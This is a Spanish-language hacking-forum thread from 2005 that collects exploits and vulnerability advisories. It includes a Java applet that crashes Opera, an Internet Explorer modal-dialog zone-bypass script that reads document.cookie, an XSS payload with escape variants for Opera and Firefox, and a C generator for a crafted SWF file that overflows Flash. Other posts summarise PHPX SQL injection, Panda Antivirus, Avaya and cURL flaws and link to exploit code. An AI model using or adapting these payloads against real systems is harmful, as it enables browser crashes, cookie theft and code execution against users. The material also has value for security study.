elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.


 


Tema destacado: ¿Usas Skype? Protégete de los Skype Resolver


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Bugs y Exploits (Moderador: berz3k)
| | |-+  Recopilatorio de Exploits Interesantes (-Actualizando-)
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: 1 [2] 3 4 5 6 7 8 Ir Abajo Respuesta Imprimir
Autor Tema: Recopilatorio de Exploits Interesantes (-Actualizando-)  (Leído 98,667 veces)
mousehack


Desconectado Desconectado

Mensajes: 1.142

Ex-Colaborador....!!!!!!XD


Ver Perfil
Opera Web Browser JNI Routine Handling Remote Denial of Service Vulnerability
« Respuesta #10 en: 1 Diciembre 2005, 20:34 »

version Vulnerable 8.5 y anteriores

Detalles:
----------

El Navegador ópera es propenso a un remote denial of service

El problema se presenta cuando el navegador maneja un applet de Java que contiene una rutina de JNI.

Un ataque exitoso puede causar que el navegador se ¨cuelgue¨.

Prueba de Concepto:
------------------------

Código:
import java.applet.Applet;
import java.awt.Graphics;

import netscape.javascript.JSObject;

public class OperaTest extends Applet{
        static {
        System.out.println("Loaded 1.2");
    }
        public void paint(Graphics g) {
        System.out.println("start");
        try {
        netscape.javascript.JSObject jso = JSObject.getWindow(this);
        System.out.println(jso.getClass());
        com.opera.JSObject j = (com.opera.JSObject ) jso;
        char[] x = new char[1000000];
                for (int y = 0 ; y < x.length; y++) {
            x [y] = 'A';
        }
        String z = new String(x);
                    System.out.println("after evalb");
        j.removeMember(z);
        System.out.println("after remove");
        }
        catch (Exception e) {
            e.printStackTrace();
        }
    }
}

Mi Prueba de Concepto (utilizando applet)

http://ciberia.ya.com/webmousehack/OperaCrash.html

Fuente:packetstorm

Salu2
« Última modificación: 1 Diciembre 2005, 22:32 por mousehack » En línea



VISITEN MI BLOG PERSONAL....
http://mousehack.blogspot.com/ ...XD
mousehack


Desconectado Desconectado

Mensajes: 1.142

Ex-Colaborador....!!!!!!XD


Ver Perfil
Microsoft Windows CreateRemoteThread Local Denial of Service Vulnerability
« Respuesta #11 en: 1 Diciembre 2005, 20:49 »

Detalles:
----------
Microsoft Windows es propenso a un local denial of service.
Los informes indican que un proceso puede llamar a la funcion 'CreateRemoteThread'  para provocar este problema.

Se informó que este ataque se puede llevar a cabo por un usuario local sin privilegios

Exploit:
--------

http://www.securityfocus.com/data/vulnerabilities/exploits/win_dos.c

fuente:securityfocus

Salu2

En línea



VISITEN MI BLOG PERSONAL....
http://mousehack.blogspot.com/ ...XD
mousehack


Desconectado Desconectado

Mensajes: 1.142

Ex-Colaborador....!!!!!!XD


Ver Perfil
Microsoft Internet Explorer Modal Dialog Zone Bypass Vulnerability
« Respuesta #12 en: 1 Diciembre 2005, 22:18 »

interesante informacion de como se podria utilizar un bug en internet explorer para instalar malware en una pc mediante ¨modal Dialog¨, que si bien se hablo con anterioridad de esto, en este caso veremos una aplicacion practica.

Informacion de Securityfocus:

a)creamos un html:

Código:
<HTML>
<SCRIPT>
//liudieyuinchina AT yahoo DzeroT com DzeroT cn
//ALL IE SECURITY MESSAGES!!!!!! always up2hour at http://iebug.com
//http://umbrella.name/
//message: davinci is still alive

location.href = "http://www.google.com/";
showModalDialog("md.htm",window).location = "javascript:alert(document.cookie)";
</SCRIPT>
</HTML>

donde ¨md.htm¨ contiene lo siguiente:

Código:
<HTML>
Close this dialog when google is loaded in the main window.

<SCRIPT>
//liudieyuinchina AT yahoo DzeroT com DzeroT cn
//ALL IE SECURITY MESSAGES!!!!!! always up2hour at http://iebug.com
//http://umbrella.name/
//message: davinci is still alive

window.returnValue = window.dialogArguments;
</SCRIPT>
</HTML>

ahora bien para mayor abundancia, y para ver y probar,y eventualmente modificar algo, les recomiendo que lean lo siguiente:

http://ciberia.ya.com/webmousehack/insiderdoc_by_jelmer.html

Salu2

En línea



VISITEN MI BLOG PERSONAL....
http://mousehack.blogspot.com/ ...XD
mousehack


Desconectado Desconectado

Mensajes: 1.142

Ex-Colaborador....!!!!!!XD


Ver Perfil
Vector de ataque XSS para Opera 8.51 y Firefox 1.5
« Respuesta #13 en: 2 Diciembre 2005, 23:57 »

POC:

<anytag
style="background:url("javascri\Dpt:/*/**/(function a()
{alert('javascript es ejecutado.')})();");"
/>

otras variantes que se pueden utilizar:

Código:
"\d"
"\D"
"\0d"
"\00000d"
"\d "
"\00000d "
"\a"
"\9"
e.t.c.

afecta a el Opera 8.51 y al Firefox 1.5, testeado con windows XP SP2

opiniones???

Salu2 boys
En línea



VISITEN MI BLOG PERSONAL....
http://mousehack.blogspot.com/ ...XD
#Borracho.-


Desconectado Desconectado

Mensajes: 1.047


Negative!


Ver Perfil
Inyección SQL en 'username' de PHPX
« Respuesta #14 en: 4 Diciembre 2005, 15:28 »

Inyeccción SQL en 'username' de PHPX
--------------------------------------------------------------------------------
 
 
Se reportó una vulnerabilidad en PHPX, que puede explotarse para realizar ataques de inyección SQL y comprometer un sistema vulnerable.

 
Fecha de Liberación: 2 de Diciembre de 2005
Ultima Revisión: 3 de Diciembre de 2005
Fuente: rgod
 


Sistemas Afectados

PHPX   <   3.5.9 
 
 
Riesgo
Altamente Crítico
Problema de Vulnerabilidad
Remoto
Tipo de Vulnerabilidad
Verificación deficiente en parametros.
 
Descripción

rgod reportó una vulnerabilidad en PHPX, que puede explotarse por personas maliciosas para realizar ataques de inyección SQL y comprometer un sistema vulnerable.

La entrada que se pasa al campo "username", cuando se ingresa a la sección de adminstración, no es verificada apropiadamente antes de utilizarse en una petición SQL. Esto podría explotarse para manipular las peticiones SQL inyectando código SQL arbitrario.

Además, puede explotarse para burlar el proceso de autenticación e ingresar a la sección de administración donde se puede cargar y ejecutar scripts de PHP arbitrarios.

Una explotación exitosa requiere que "magic_quotes_gpc" este deshabilitado.

La vulnerabilidad fue reportada en la versión 3.5.9 y anterior. Otras versiones también podrían ser afectadas.


Impacto

Security Bypass.

Manipulación de datos.

Acceso al sistema.


Solución

Editar el código fuente para asegurarse que la entrada es verificada apropiadamente.


Apéndices
http://rgod.altervista.org/phpx_359_xpl.html
 
 
En línea

Si nos quedamos en este mundo, que no sea con hambre...
#Borracho.-


Desconectado Desconectado

Mensajes: 1.047


Negative!


Ver Perfil
Buffer overflow al descomprimir archivos ZOO en Panda Antivirus
« Respuesta #15 en: 4 Diciembre 2005, 15:32 »

Buffer Overflow al descomprimir archivos ZOO en Panda Antivirus.
--------------------------------------------------------------------------------
 
 
Se reportó una vulnerabilidad en Panda Antivirus, que podría explotarse para comprometer un sistema vulnerable.

 
Fecha de Liberación: 30 de Noviembre de 2005
Ultima Revisión: 30 de Noviembre de 2005
Fuente: Alex Wheleer
 


Sistemas Afectados

  • Panda Antivirus   ==   Enterprise 
    Panda Antivirus   ==   Platinum 
    Panda Antivirus   ==   Small Bussines
 
 
 
Riesgo
Altamente Crítico
Problema de Vulnerabilidad
Remoto
Tipo de Vulnerabilidad
Buffer Overflow
 
Descripción

Alex Wheeler reportó una vulnerabilidad en Panda Antivirus, que podría explotarse por personas maliciosas para comprometer un sistema vulnerable.

La vulnerabilidad es ocasionada por un error en el control de los límites de la memoria dentro de "pskcmp.dll" cuando realizá una descompresión Lempel-Ziv de archivos ZOO. Esto puede explotarse para ocasionar un desbordamiento de memoria en el heap y podría permitir la ejecución de código arbitrario cuando se analiza un archivo ZOO malicioso.

Los siguientes son productos de Panda afectados por esta vulnerabilidad:

Código:
Panda AntiVirus Enterprise Suite
Panda AntiVirus Platinum 7.x
Panda AntiVirus Small Business Edition
Panda AntiVirus Titanium
Panda CommandlineSecure Antivirus
Panda CVPSecure Antivirus
Panda DominoSecure Antivirus
Panda ExchangeSecure Antivirus
Panda FileSecure Antivirus
Panda ISASecure Antivirus
Panda PerimeterScan
Panda PostfixSecure Antivirus
Panda ProxySecure Antivirus
Panda QmailSecure Antivirus
Panda SendmailSecure Antivirus



Impacto

Acceso al sistema.


Solución

Filtrar los archivos ZOO de correos electrónicos o vía proxys.


Apéndices
http://www.rem0te.com/public/images/panda.pdf
 
 
En línea

Si nos quedamos en este mundo, que no sea con hambre...
#Borracho.-


Desconectado Desconectado

Mensajes: 1.047


Negative!


Ver Perfil
Macromedia Flash Player "Flash.ocx" Memory Corruption Remote PoC Exploit
« Respuesta #16 en: 5 Diciembre 2005, 13:55 »



Advisory ID : FrSIRT/ADV-2005-2317
CVE ID : CVE-2005-2628
Rated as : Critical
Note : This proof-of-concept exploit generates a flash file that will cause a DoS

/*

* ********************************************************* *
* Macromedia Flash Plugin - Buffer Overflow in flash.ocx                       *
* ********************************************************* *
* Version: v7.0.19.0                                                                           *
* PoC coded by: BassReFLeX                                                              *
* Date: 11 Oct 2005                                                                           *
* ********************************************************* *

Código:
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

void usage(char* file);

/*
<swf>
...
</swf>
*/
char SWF[] = "<swf>";
char SWF_[] = "</swf>";

//[SetBackgroundColor]
char SetBackgroundColor[] = "\x43\x02\xff\x00\x00";

//[DoAction] 1 pwn j00r 455!
char DoAction[] =
"\x3c\x03\x9b\x08\x00\x41\x41\x41\x41\x41\x41\x41\x41\x00\x40\x00"
"\x42\x42\x42\x42\x42\x42\x42\x42\x00\x43\x43\x43\x43\x43\x43\x43"
"\x43\x00\x44\x44\x44\x44\x44\x44\x44\x44\x00\x45\x45\x45\x45\x45"
"\x45\x45\x45\x00\x46\x46\x46\x46\x46\x46\x46\x46\x00\x00";

//[ShowFrame]
char ShowFrame[] = "\x40\x00";

//[End]
char End[] = "\x00\x00";

int main(int argc,char* argv[])
{
system("cls");
printf("\n* ********************************************************* *");
printf("\n* Macromedia Flash Plugin - Buffer Overflow in flash.ocx                       *");
printf("\n* ********************************************************* *");
printf("\n* Version: v7.0.19.0                                                                          *");
printf("\n* Date: 11 Oct 2005                                                                          *");
printf("\n* ProofOfConcept(POC) coded by: BassReFLeX                                    *");
printf("\n* ********************************************************* *");

if ( argc!=2 )
{
usage(argv[0]);
}

FILE *f;
f = fopen(argv[1],"w");
if ( !f )
{
printf("\nFile couldn't open!");
exit(1);
}

printf("\n\nWriting crafted .swf file . . .");
fwrite(SWF,1,sizeof(SWF),f);
fwrite("\n",1,1,f);
fwrite(SetBackgroundColor,1,sizeof(SetBackgroundColor),f);
fwrite("\n",1,1,f);
fwrite(DoAction,1,sizeof(DoAction),f);
fwrite("\n",1,1,f);
fwrite(ShowFrame,1,sizeof(ShowFrame),f);
fwrite("\n",1,1,f);
fwrite(End,1,sizeof(End),f);
fwrite("\n",1,1,f);
fwrite(SWF_,1,sizeof(SWF_),f);
printf("\nFile created successfully!");
printf("\nFilename: %s",argv[1]);
return 0;
}

void usage(char* file)
{
printf("\n\n");
printf("\n%s <Filename>",file);
printf("\n\nFilename = .swf crafted file. Eg: overflow.swf");
exit(1);
}
 



Fuente: http://www.frsirt.com/exploits/20051118.Flashosx.c.php
En línea

Si nos quedamos en este mundo, que no sea con hambre...
BenRu
The Prodigy


Desconectado Desconectado

Mensajes: 4.004


Ver Perfil
Denegación de servicio en Avaya Media Gateway
« Respuesta #17 en: 5 Diciembre 2005, 19:14 »

Se ha anunciado la existencia de una vulnerabilidad en Avaya Media
Gateway TN2602AP IP Media Resource 320, que puede ser explotada por
usuarios maliciosos para provocar denegaciones de servicio.

Hay que señalar que el circuito TN2602AP IP Media Resource 320 es
un componente opcional de Avaya G650 Media Gateway.

El problema se debe a un error no detallado, pero que puede ser
explotado para provocar fugas de memoria, lo que podría llegar a
emplearse para llevar a cabo ataques de denegación de servicio a
través de paquetes específicamente creados.

La vulnerabilidad se ha confirmado en las versiones del firmware
anteriores a la 9, que puede descargarse desde:
http://support.avaya.com/japple/css/japple?temp.documentID=236667&temp.productID=136527&temp.releaseID=228560&temp.bucketID=108025&PAGE=Document#TN2602

Más Información:

Talkpath issue for TN2602AP IP Media Resource 320
http://support.avaya.com/elmodocs2/security/ASA-2005-231.pdf
 
Fuente: www.hispasec.com
En línea

BenRu
The Prodigy


Desconectado Desconectado

Mensajes: 4.004


Ver Perfil
Denegación de servicio en navegador Opera
« Respuesta #18 en: 6 Diciembre 2005, 17:38 »

Se ha anunciado una vulnerabilidad en el navegador Opera que puede
permitir a usuarios remotos la realización de ataques de denegación
de servicio.

Es posible provocar la caída de Opera 8.50 con un applet de Java. La
vulnerabilidad reside en un error en una rutina JNI implementando la
clase com.opera.JSObject.

Se ha publicado una prueba de concepto disponible en:
http://www.illegalaccess.org/exploit/opera85/OperaApplet.html

Se recomienda la actualización a Opera 8.51 que corrige el problema,
disponible en: http://www.opera.com/download/

Más Información:

Opera Java Applet DoS
http://www.securiteam.com/windowsntfocus/6Y0010AEUA.html

Fuente: www.hispasec.com
En línea

BenRu
The Prodigy


Desconectado Desconectado

Mensajes: 4.004


Ver Perfil
Actualización de seguridad para cURL
« Respuesta #19 en: 10 Diciembre 2005, 17:56 »

Las versiones de "cURL" no actualizadas contienen una vulnerabilidad que
permite que un atacante ejecute código arbitrario bajo los privilegios
del proceso que utilice "cURL".

"cURL" es una librería y herramienta para descargar ficheros por Gopher,
FTP, FTPs, HTTP, HTTPs, telnet, DICT, FILE y LDAP.

El problema reside en la rutina de gestión de URLs. Si un atacante
proporciona a la librería una URL excesivamente larga, puede provocar un
desbordamiendo de búfer y la ejecución de código arbitrario con los
privilegios del proceso atacado.

El ataque puede desarrollarse de dos maneras posibles, compatibles, por
lo que pueden utilizarse de forma simultanea. Aunque el desbordamiento
de búfer es muy limitado y parece difícil de explotar para provocar la
ejecución de código arbitrario, no debe descartarse. Por ello, Hispasec
recomienda a todos los usuarios de "cURL" que actualicen cuanto antes a
la versión 7.15.1, sobre todo si utilizan plataformas "little endian",
como x86.

La vulnerabilidad afecta, por supuesto, a los programas que utilicen la
librería "libcurl". Los programas enlazados de forma dinámica con la
librería deben ser reiniciados, para que empleen la versión correcta.
Los programas que se enlacen de forma estática deben ser
recompilados/reenlazados.

Las versiones afectadas son de la 7.11.2 a la 7.15.0, inclusive.

Más Información:

libcurl URL Buffer Overflow
http://curl.haxx.se/docs/security.html#20051207

Security Advisory December 7th 2005
http://curl.haxx.se/docs/adv_20051207.html

cURL
http://curl.haxx.se/
 
Fuente: www.hispasec.com
En línea

Páginas: 1 [2] 3 4 5 6 7 8 Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Recopilatorio de Mensajes Interesantes [Actualizado 01/03/10]
Hacking Básico
Rojodos 1 201,442 Último mensaje 15 Septiembre 2010, 22:23
por kamsky
Recopilatorio de temas interesantes - Scripting -
Scripting
sirdarckcat 4 23,143 Último mensaje 21 Febrero 2009, 23:48
por Foxy Rider
[Recopilatorio] Sources interesantes « 1 2 »
Programación C/C++
Littlehorse 13 30,793 Último mensaje 1 Mayo 2012, 21:12
por linkingcrk
Recopilatorio de temas interesantes
.NET
[D4N93R] 0 9,121 Último mensaje 2 Agosto 2010, 19:24
por [D4N93R]
Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines